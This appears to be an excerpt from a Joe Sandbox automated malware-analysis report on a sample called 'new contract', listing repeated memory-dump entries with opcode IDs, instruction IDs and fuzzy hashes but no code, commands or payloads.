                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 53975987bcb28be558850320974a13dcd3741c749e6333d667f4499652305c58
                                                                                                                                                                            • Instruction ID: 37897260943f305677c6f83828d2b4d443e896e605a63fdebbce9cfa9fb86cdf
                                                                                                                                                                            • Opcode Fuzzy Hash: 53975987bcb28be558850320974a13dcd3741c749e6333d667f4499652305c58
                                                                                                                                                                            • Instruction Fuzzy Hash: 7A31F731A4152C9BDB32DF18CC41FEEB7BAEB15750F0500A5EA45A7290D775DE818FA0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                                            • Instruction ID: 0d77a83b73194ae77e1b154581709a487d71ff672afdfc93f8201f65804aab50
                                                                                                                                                                            • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                                            • Instruction Fuzzy Hash: 9B217435A00615EFCB55CF58CD80A8EBBF5FF48714F5080A9EE159B241EA71DA45CB60
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 46435da00388c24ac48a44af0059fd365803db656c2ce16710113fd59259ad45
                                                                                                                                                                            • Instruction ID: a120a487a8e97dbfda42d51f63ea197fb009b4be16f169c04debec8218dab333
                                                                                                                                                                            • Opcode Fuzzy Hash: 46435da00388c24ac48a44af0059fd365803db656c2ce16710113fd59259ad45
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C21C1726087459BCB22CF58CC80B6BB7E5FB88764F008569FD559B741EB30E941CBA2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                                            • Instruction ID: 9de63dca01827086adafec7089db10328c568efeaff40e1c01a78b2fec666e48
                                                                                                                                                                            • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                                            • Instruction Fuzzy Hash: 08316B31600645EFD722CB68C984F6AB7B9EF85354F1449A9E952CB394E730EE42CB50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 64884fc09e9fa943f94586a7288774d32c59fd0a5fc1ac4eefebc3195e35afa6
                                                                                                                                                                            • Instruction ID: a88815b5f5d27b3e07cfefe8d623fb01d95a9bc540c68134d4c20b561dcb37ce
                                                                                                                                                                            • Opcode Fuzzy Hash: 64884fc09e9fa943f94586a7288774d32c59fd0a5fc1ac4eefebc3195e35afa6
                                                                                                                                                                            • Instruction Fuzzy Hash: 0A316975A00225DFCF18CF1CCC849AEB7BAEF84304B15855AF9099B391E772EA51CB94
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 98960e4755bd79b88c2eb9ed248a7a4effb7e9bc2c9b48b60ec1bfe0b798447c
                                                                                                                                                                            • Instruction ID: bfa89cbe944077c1b81dfcca5daf28663a7c48b96df5aa2e29518e1a0e605128
                                                                                                                                                                            • Opcode Fuzzy Hash: 98960e4755bd79b88c2eb9ed248a7a4effb7e9bc2c9b48b60ec1bfe0b798447c
                                                                                                                                                                            • Instruction Fuzzy Hash: 89219C719002299BCB259F59CC81ABEBBF8FF49740B400069F941AB240D738AD42CFA5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a9afd3c13942ca18680865cd3f551455085372b537efc9ced900e593dd6db1dd
                                                                                                                                                                            • Instruction ID: edd765f016212f9c74e2d7e4294b08d17f5816bf3f21685f11693c8de852192f
                                                                                                                                                                            • Opcode Fuzzy Hash: a9afd3c13942ca18680865cd3f551455085372b537efc9ced900e593dd6db1dd
                                                                                                                                                                            • Instruction Fuzzy Hash: 72218972600645AFD715DBACDD84A6AB7A8FF88740F144069F904DB7A1D738ED40CBA8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 15adc9aa1c2433ba201b037d0f6eeea7d277b8b8d953882fc62776f78181cdfe
                                                                                                                                                                            • Instruction ID: c05cc92ae3976946a9fc1012d8ff5e48307c3ab76a0b245e93911627e9703512
                                                                                                                                                                            • Opcode Fuzzy Hash: 15adc9aa1c2433ba201b037d0f6eeea7d277b8b8d953882fc62776f78181cdfe
                                                                                                                                                                            • Instruction Fuzzy Hash: 9421C2729043469FD711EF59DD48B6BBBDCAF91240F48445ABD80C7351D734DD05CAA2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 21aee5a469af3b6baf9895dc3956a96f06e8bf0ac83074c79a5d9fdba4e1e2f2
                                                                                                                                                                            • Instruction ID: 8b91dbabc47b5adbd4429439c49cd1c6b070e55e7c44a68b11b69dcd7d0458ea
                                                                                                                                                                            • Opcode Fuzzy Hash: 21aee5a469af3b6baf9895dc3956a96f06e8bf0ac83074c79a5d9fdba4e1e2f2
                                                                                                                                                                            • Instruction Fuzzy Hash: EB2107327056819BF3226B6C9D18B287BD5AF81770F290369FA20DB7D2D768C842C254
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Instruction ID: be80aa101ad0c63d347a3bc4c24b28879f5e200c141be5c056d3499072a45f84
                                                                                                                                                                            • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                                                            • Instruction Fuzzy Hash: F721E2B5A00B059FD3A0CF29C840B52BBE4FB48B10F10492EE98AC7B40E371E814CB94
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                                                            • Instruction ID: 7720133affdc565300b75cf0c0a4f19f5e45934ee3799fc8dc8ea5f9c2701471
                                                                                                                                                                            • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                                                            • Instruction Fuzzy Hash: 6A11C232600601EFE7219F48CC40B56BBE6EF85754F46842CEA0A9B260DB32DD40DFA0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 51360da2fc8236184c7304c477dea884131305a3c05ffb8d5a4f64e12cbe06c7
                                                                                                                                                                            • Instruction ID: bb76ccb2447c567ea80c43d2abf1f7fe20e056e5b7f956f022378d2038677fc5
                                                                                                                                                                            • Opcode Fuzzy Hash: 51360da2fc8236184c7304c477dea884131305a3c05ffb8d5a4f64e12cbe06c7
                                                                                                                                                                            • Instruction Fuzzy Hash: CE010472605645AFF316A6ADEC98F6B7A8DEF80390F160069FD00CB341DA14DC01C275
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 67f357dead2792246e84333172c30f3925a10ffcdbe830539cba519339c3fd36
                                                                                                                                                                            • Instruction ID: 7f8514ef4ce3d7fe5a78bf12822abd4a14a425a3ad45cf8fa9812d51baeda750
                                                                                                                                                                            • Opcode Fuzzy Hash: 67f357dead2792246e84333172c30f3925a10ffcdbe830539cba519339c3fd36
                                                                                                                                                                            • Instruction Fuzzy Hash: 7311C236200A65AFDB25CF59DC80F667BA9EB85764F004519FA288B750CB71E800CF60
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ee5a55da8d91936379d856e41fb39d1889ab4d8d907f2460e2694510ed1b0706
                                                                                                                                                                            • Instruction ID: 082e86b85590d4cb0f8f9fd823aab096b2a884122df29baa80a2df2fcf63a289
                                                                                                                                                                            • Opcode Fuzzy Hash: ee5a55da8d91936379d856e41fb39d1889ab4d8d907f2460e2694510ed1b0706
                                                                                                                                                                            • Instruction Fuzzy Hash: A011E0322006059BD7229A29DC44B67B7A6FFC4210F14442DEB4287B91DF30A802CB90
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: de24391a5249a0ebe51175bdf7153b8b3b048738d99a74042c9a0ed90ccdebbe
                                                                                                                                                                            • Instruction ID: 95f9369d0c928d7d685a2d5b55a0e63953674ac4a999cd1b257d94bbf3ef20ff
                                                                                                                                                                            • Opcode Fuzzy Hash: de24391a5249a0ebe51175bdf7153b8b3b048738d99a74042c9a0ed90ccdebbe
                                                                                                                                                                            • Instruction Fuzzy Hash: 8111CE72A01626ABDB21DF59CD80B5EFBB9EF88750F900068EE01A7300D730AD01CBA5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0569ef2a552e51e069a3d7431bf331dd3bb2dfb4a02e4a7624d90b6843e9ff55
                                                                                                                                                                            • Instruction ID: 11fb1ab6ea9b9969f7724a7f04dab5990f716b34b4a45791b02320c0a15e2192
                                                                                                                                                                            • Opcode Fuzzy Hash: 0569ef2a552e51e069a3d7431bf331dd3bb2dfb4a02e4a7624d90b6843e9ff55
                                                                                                                                                                            • Instruction Fuzzy Hash: 9201D27150010A9FC329DF1CD844F26BBFAFBC6724F20816EE0048B264D7749C82CB94
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                                            • Instruction ID: 54f8179331011726ab4b46c89674e138461f5b74e4b4dd9d0599dc1afdf383ff
                                                                                                                                                                            • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                                            • Instruction Fuzzy Hash: B3118E722016C2DBEB26A72CDD58B257B94FB41758F1901E0EE41CB792F72EC842C2A0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                                            • Instruction ID: 91c1d9b6fd424ffe47dbd65f181c33a0aa0d836e0fb984e3fab2670320275928
                                                                                                                                                                            • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                                            • Instruction Fuzzy Hash: 89019236700615AFE7219F58CC40F7A7EAAEB85750F458428EA059B260E772ED41CF94
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                            • Instruction ID: 1fc1c22084cdd101d16e8724c362ebc1707614342a24113f20feacf6cb93cd3c
                                                                                                                                                                            • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                            • Instruction Fuzzy Hash: F00126714067619BCB318F59DC40AB27BA9EF55760B08C62DFC958B285C331D401CB60
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4cb087ac9d69072ead517004126850c60c3d2660bdc7d6eba37c6807c3ca4280
                                                                                                                                                                            • Instruction ID: a4fccbc8259fed37d647ae07b414b4ceec3258ca47f8bc2c098d1cdbac3879c9
                                                                                                                                                                            • Opcode Fuzzy Hash: 4cb087ac9d69072ead517004126850c60c3d2660bdc7d6eba37c6807c3ca4280
                                                                                                                                                                            • Instruction Fuzzy Hash: 7C01D6726415019FC732DF1CDC40E13B7A9EB91770B15425DEA689B696EB30D801C7D0
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bc0131e0e2fa1b4c7a1be9584749a12cd38fce75c68bc95a5c60efb2d84a45a2
• Instruction ID: 33439ecc6663618f2f242490c3657edf40226af28d1b20243128d9ebff8a3592
• Opcode Fuzzy Hash: bc0131e0e2fa1b4c7a1be9584749a12cd38fce75c68bc95a5c60efb2d84a45a2
• Instruction Fuzzy Hash: E711AD32241641EFDB15EF19CD90F16BBB9FF58B44F2000A9F9059B661C336ED01CA94
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 59a7415a9010eb528870c5290d7a3426876d36c41de2717091c59f94f32533c2
                                                                                                                                                                            • Instruction ID: b39549688666d0033fc1cc83c64838a8c2538078e905e2f558945dfe86a2340e
                                                                                                                                                                            • Opcode Fuzzy Hash: 59a7415a9010eb528870c5290d7a3426876d36c41de2717091c59f94f32533c2
                                                                                                                                                                            • Instruction Fuzzy Hash: C41179B16083089FC300DF69D841A5BBBF8FF99350F00851EBA58D73A4E630E900CB96
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                            • Instruction ID: c07f760d013db8ef19a0f55a4e0c07d21e75efa0dac933b5c81db8c0918cbb7e
                                                                                                                                                                            • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                            • Instruction Fuzzy Hash: F1018B32200680DFE322871DCE48F26BBE8EF94764F0904A6F905CB7A1D739DC41CA25
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d82b15eb158864e2d77919290c66ea35952b4d2d4274be3933def68cbdba649d
                                                                                                                                                                            • Instruction ID: 4bf0eaa01db59bb89fb5cf032c8b000cd76ec207405d0ee1a80035a785ef81a8
                                                                                                                                                                            • Opcode Fuzzy Hash: d82b15eb158864e2d77919290c66ea35952b4d2d4274be3933def68cbdba649d
                                                                                                                                                                            • Instruction Fuzzy Hash: 36018F317105059BD715EF69DC109AABBAEFF81620F5980699A01A7798EE20DD02C694
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: b2ecd00c2dc56ea74dd17eff94e079f6a7a7b4fad22f08866898d0bc11df1a33
                                                                                                                                                                            • Instruction ID: 85ab2c29366ef9096b33c0c37ed1564dc6f88a5422bb9dca5e0890dca5fb8621
                                                                                                                                                                            • Opcode Fuzzy Hash: b2ecd00c2dc56ea74dd17eff94e079f6a7a7b4fad22f08866898d0bc11df1a33
                                                                                                                                                                            • Instruction Fuzzy Hash: 2D018FB1284601AFD3315B19DD50B22BAB9EF95F60F05442EB2169B390D7B1A8418B68
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: da42ecc5e13c68dafdbff8aeff93acaf4aa86572347897780ad8973e29506b56
                                                                                                                                                                            • Instruction ID: 5a67bd4cf47d0f0547f85042cb5d512d6d4cce957957015ce90813fffe27bd57
                                                                                                                                                                            • Opcode Fuzzy Hash: da42ecc5e13c68dafdbff8aeff93acaf4aa86572347897780ad8973e29506b56
                                                                                                                                                                            • Instruction Fuzzy Hash: 65F0A433A41B21B7C7319B5A8D50F57BAAAEBC4B90F15842DE606A7740DA34ED01CAA0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                            • Instruction ID: 6e88c0e01b46e890c05b090dd98b440f11268dad550fd637c3b3b19c44a3585a
                                                                                                                                                                            • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                            • Instruction Fuzzy Hash: 92F062B2601615ABD328CF4DDC40E57FBEEDBD5A90F05812DA555D7320EA31DD05CBA0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a754ad86a7b7228dac79a62fad5b118a81e54a2522501f8832f492284a7b551d
                                                                                                                                                                            • Instruction ID: 5c062f96e283f9ceb12ce10ba2cdb825ab6ee17d45f382049c5675fa73bfe1b2
                                                                                                                                                                            • Opcode Fuzzy Hash: a754ad86a7b7228dac79a62fad5b118a81e54a2522501f8832f492284a7b551d
                                                                                                                                                                            • Instruction Fuzzy Hash: 38012176A10209ABDB04DFA9D951A9EB7F8FF58704F10405AE904E7350D6749A018BA4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                            • Instruction ID: 20e5c249db115cf97c134ee0d0eb5f6dca3ae0c6010ea47362951b4820ff6788
                                                                                                                                                                            • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                            • Instruction Fuzzy Hash: D1F02B33284A339BD7325A9D4C40B2FAA9A9FD1B64F1E0039F2099B74CCA658D0397D0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4192285dea0a92dac813158ed676254244fc85c411f82acb43d2eb4578afeb8e
                                                                                                                                                                            • Instruction ID: 89fd39f42cdf809fa47def846fa389f30da4bb84228c50cd083b39c6618ddd1d
                                                                                                                                                                            • Opcode Fuzzy Hash: 4192285dea0a92dac813158ed676254244fc85c411f82acb43d2eb4578afeb8e
                                                                                                                                                                            • Instruction Fuzzy Hash: 40014475A10209EFCB04DFA9D951AAEB7F9FF58304F10805AF904E7351D674AE01CBA4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a7d360a58d26b206584a9361827ac99da1857a0cacc1a07ca14397588a462b85
                                                                                                                                                                            • Instruction ID: 68a54f6a9c0fe3ea2447e96272ee55590975c57ecaa057428bdeca458c42af73
                                                                                                                                                                            • Opcode Fuzzy Hash: a7d360a58d26b206584a9361827ac99da1857a0cacc1a07ca14397588a462b85
